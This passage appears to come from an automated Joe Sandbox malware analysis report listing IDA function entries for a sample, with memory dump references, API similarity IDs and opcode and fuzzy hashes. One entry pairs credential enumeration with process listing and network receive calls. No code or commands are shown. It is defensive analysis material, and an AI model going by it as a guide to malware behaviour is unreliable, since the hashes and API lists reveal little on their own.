                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseCreateCredEnumerateFirstHandleMutexProcess32ReleaseSnapshotToolhelp32recv
                                                                                                                • String ID:
                                                                                                                • API String ID: 420082584-0
                                                                                                                • Opcode ID: bdc3095a1b87ea801f36cca919535da8ad91ef6c23b11170d4e8423925a6948e
                                                                                                                • Instruction ID: b7027bf2ce9b2ea6ad0ceec43819c75fce15e83751ebe24b1eb90875d48ac58b
                                                                                                                • Opcode Fuzzy Hash: bdc3095a1b87ea801f36cca919535da8ad91ef6c23b11170d4e8423925a6948e
                                                                                                                • Instruction Fuzzy Hash: 3A213651E0D68342FB10B7B4A4563BE5260AF867F0F146B31E6BEC15D7FF1CA0819611
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: CloseHandleMutexReleaserecv
                                                                                                                • String ID:
                                                                                                                • API String ID: 2659716615-0
                                                                                                                • Opcode ID: 243e1f54ec1414a6cb5ddf1cb52e513f16c7a96ffc7a79d155c63164a1710649
                                                                                                                • Instruction ID: e6c90422daa95262677bfcff468d4f2c6333034296dc1ceb65115e1ef96b7fa1
                                                                                                                • Opcode Fuzzy Hash: 243e1f54ec1414a6cb5ddf1cb52e513f16c7a96ffc7a79d155c63164a1710649
                                                                                                                • Instruction Fuzzy Hash: 2A119E52E0C68342FB10B774A4163BB5260AF857F0F046B30EABEC16D7FF1CA0819611
                                                                                                                APIs
                                                                                                                • SetFilePointerEx.KERNEL32(?,?,?,?,?,00007FF6F1DF0E88,?,?,?,?,00000000,00007FF6F1DF0F91), ref: 00007FF6F1DF0EE8
                                                                                                                • GetLastError.KERNEL32(?,?,?,?,?,00007FF6F1DF0E88,?,?,?,?,00000000,00007FF6F1DF0F91), ref: 00007FF6F1DF0EF2
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFileLastPointer
                                                                                                                • String ID:
                                                                                                                • API String ID: 2976181284-0
                                                                                                                • Opcode ID: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
                                                                                                                • Instruction ID: 7df5e53e0252aca9fb7d8034c75a13f93b0dfbe6c3cc613a2d48d17f0a892607
                                                                                                                • Opcode Fuzzy Hash: 85342b8448b5f83962e520861b5040a532baca975cc467821ece28218af4e603
                                                                                                                • Instruction Fuzzy Hash: 4411C162B18B8281DB108B25A404069A3A2EB44BF4F584331EE7E877E9EF7CD5518B40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: Concurrency::cancel_current_task$std::bad_alloc::bad_alloc
                                                                                                                • String ID:
                                                                                                                • API String ID: 1173176844-0
                                                                                                                • Opcode ID: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
                                                                                                                • Instruction ID: 8d7c6629df132d622177bc2d585b0e445dd40f5fc520a52c163dd6dd2bd5a034
                                                                                                                • Opcode Fuzzy Hash: ad7fb39d7d0572768195cdb96d88edf57c93c5d00d8eaa663e4c704e5b7bea2c
                                                                                                                • Instruction Fuzzy Hash: 38E01741E1A20B19FF2C32B219160B900B00FC97F4E2D1B30E97DC82C3BF2CB691A290
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: ErrorFreeHeapLast
                                                                                                                • String ID:
                                                                                                                • API String ID: 485612231-0
                                                                                                                • Opcode ID: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
                                                                                                                • Instruction ID: 657f89f3da78b6526861adec5cb51cf06ef06baface02bc2bcaf5db71db7f855
                                                                                                                • Opcode Fuzzy Hash: b7253a55b1276d1b57d670979138b52c86c30a15e8b70f9b8b054cc625f4c6ce
                                                                                                                • Instruction Fuzzy Hash: 90E01241F0EA4792FF186BF298551B552B15FA8BD2F444534D93EC32D2FF1C66858700
                                                                                                                APIs
                                                                                                                  • Part of subcall function 00007FF6F1DA0610: Concurrency::cancel_current_task.LIBCPMT ref: 00007FF6F1DA0778
                                                                                                                  • Part of subcall function 00007FF6F1DA0610: _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6F1DA0784
                                                                                                                • _invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FF6F1D9447D
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn$Concurrency::cancel_current_task
                                                                                                                • String ID:
                                                                                                                • API String ID: 3936042273-0
                                                                                                                • Opcode ID: f7a5fae346d49418a259f2144e74660c7793d79a264084466c1e800f2545a7eb
                                                                                                                • Instruction ID: 8b14f122d5a88948b4a91cd366bdd54552d37824e1d56100f4731a5da496bdc2
                                                                                                                • Opcode Fuzzy Hash: f7a5fae346d49418a259f2144e74660c7793d79a264084466c1e800f2545a7eb
                                                                                                                • Instruction Fuzzy Hash: 3CE17B22B18A4185FB10CB65E5702AD37B0FB64B98F858236CE6D57BDAEF78D490C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: 46bfd7fd693d14b8a40e56580b9aca085a586189c41b9c025baaca2826a730ce
                                                                                                                • Instruction ID: 18291871a8683347e9d4bc4f50e8373474b061f74679736ef95c520882fb9235
                                                                                                                • Opcode Fuzzy Hash: 46bfd7fd693d14b8a40e56580b9aca085a586189c41b9c025baaca2826a730ce
                                                                                                                • Instruction Fuzzy Hash: 46B17D73605A81CADB208F25E0A02AC73B5FB48B98F445632EB6D87BD8EF39D555C300
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: b46c84e554cf87a31c7403c59b850c015f01269e6a4ab1ed29684fe9716b0d09
                                                                                                                • Instruction ID: b2b175e9cd69f00a6218a1ed6814c3de672c1b6d90e65ee4450e2c141a4c0044
                                                                                                                • Opcode Fuzzy Hash: b46c84e554cf87a31c7403c59b850c015f01269e6a4ab1ed29684fe9716b0d09
                                                                                                                • Instruction Fuzzy Hash: 9E51D022F08AC59AFF118F78D4003BC7372AF54788F045720DEAE62AD5EF38A5958340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
                                                                                                                • Instruction ID: 0569b8ec176bf3101c38a35bf8163050edb98975370d5b71bd194c22d03a1eaa
                                                                                                                • Opcode Fuzzy Hash: 506399ceb7efd258d9ee9312528a7fb0108d3bcc24f039aa6e7519c78468f3b6
                                                                                                                • Instruction Fuzzy Hash: 9E41F432909A0687EB648B18D940279B3B1FB56BD2F101331DAAEC36D0EF2CE602C750
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: d56805f9f9b8ac08e9b0cad6b337a6538991adb9596a96bd4002cb9149b5e6e5
                                                                                                                • Instruction ID: 28a86cbd40ddb613b6c856eb68c071f6b231dc1529d36332168716913b45c485
                                                                                                                • Opcode Fuzzy Hash: d56805f9f9b8ac08e9b0cad6b337a6538991adb9596a96bd4002cb9149b5e6e5
                                                                                                                • Instruction Fuzzy Hash: 1E413872F15B488EE7008FB9D4413AC73B6E788798F005625EEAC66B89EF3491648394
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
                                                                                                                • Instruction ID: b1cdf05a08d57f9c02f804a817bf5b9bbc48a62f375674efa5d1e2eae7a6e815
                                                                                                                • Opcode Fuzzy Hash: a24f7c79d48368e33d7deb9d4eeecb52ce7ec7a6106812cc151fd4020b53ad0d
                                                                                                                • Instruction Fuzzy Hash: 4B31CA22E1C64286F7516B5598003BC6AA0AF94FE1F820335E93DC33D2EF7DE6418790
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
                                                                                                                • Opcode ID: ac99ae4b8f2f9aeb6558dedae17f3ad0c9b61f3dc6d82d2f0be5afc8845eae51
                                                                                                                • Instruction ID: fdd9e7cf4773cbd03345bafe68ae75b2f2eb2d6dde30a5dcc470590457c89f0d
                                                                                                                • Opcode Fuzzy Hash: ac99ae4b8f2f9aeb6558dedae17f3ad0c9b61f3dc6d82d2f0be5afc8845eae51
                                                                                                                • Instruction Fuzzy Hash: DB310976B05B4981EF058F69D4A026C3365EB88F89B948536CF5D477A8EF3CD454C340
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: HandleModule$AddressFreeLibraryProc
                                                                                                                • String ID:
                                                                                                                • API String ID: 3947729631-0
                                                                                                                • Opcode ID: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
                                                                                                                • Instruction ID: 4c6382a82b1edfb424c91bea7a46025a887e4d3aaf44807eb05a94f319ae3756
                                                                                                                • Opcode Fuzzy Hash: 9e03c0276b42d0bae273c9ceb8b8abd1e24865752fa8da44abca3c0ffcb1668a
                                                                                                                • Instruction Fuzzy Hash: 32214C32A046468AEB648F68C4482EC37B0EB5475CF580735E73D86AD5EF78D684CB40
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
                                                                                                                • Instruction ID: b8ab04e406a0588d883b5567a5d17af0f1e39038b529860be5219634dddfef1e
                                                                                                                • Opcode Fuzzy Hash: 277766cc613ac521deff1262cc5973a4c6dda0ce244441028124d0478fb53980
                                                                                                                • Instruction Fuzzy Hash: 28116D32E1D64281EB60AF1194002BEA2B0BF95BC0F445131EAEED7BD6EF3CE9009740
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
                                                                                                                • Instruction ID: 434e408dc77c73d0e24f8d67fdf1568321becaddfe8593d6fd42d45c075337ae
                                                                                                                • Opcode Fuzzy Hash: 4bdd7c7df9abbb715da046ae302baf4d590079e7e30464498c50f0bf6b7ea38d
                                                                                                                • Instruction Fuzzy Hash: C821A472A1CA4287DB658F18D4403B976A0EB95BD4F585238E67EC76D9EF3CD4508B00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo
                                                                                                                • String ID:
                                                                                                                • API String ID: 3215553584-0
                                                                                                                • Opcode ID: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
                                                                                                                • Instruction ID: f56ffa6585533dfe67a5ebab9ed20e18f766a325d27a241eec40d39af7552209
                                                                                                                • Opcode Fuzzy Hash: 42dcc955d4fd3197300f6b05653cf2d2f457e7ff6d65b15765544b4f1739082b
                                                                                                                • Instruction Fuzzy Hash: 66115832A1D64682E3109F14A444069A3B1EF807D0F450634EA7EC77E6EF3CFA108F00
                                                                                                                APIs
                                                                                                                Memory Dump Source
                                                                                                                • Source File: 0000000C.00000002.2110477968.00007FF6F1D51000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF6F1D50000, based on PE: true
                                                                                                                • Associated: 0000000C.00000002.2110450687.00007FF6F1D50000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110582934.00007FF6F1E25000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110661168.00007FF6F1E80000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110693908.00007FF6F1E82000.00000008.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110736328.00007FF6F1E85000.00000004.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                • Associated: 0000000C.00000002.2110797007.00007FF6F1E88000.00000002.00000001.01000000.0000000F.sdmpDownload File
                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                • Snapshot File: hcaresult_12_2_7ff6f1d50000_io12j1es.jbxd
                                                                                                                Similarity
                                                                                                                • API ID: _invalid_parameter_noinfo_noreturn
                                                                                                                • String ID:
                                                                                                                • API String ID: 3668304517-0
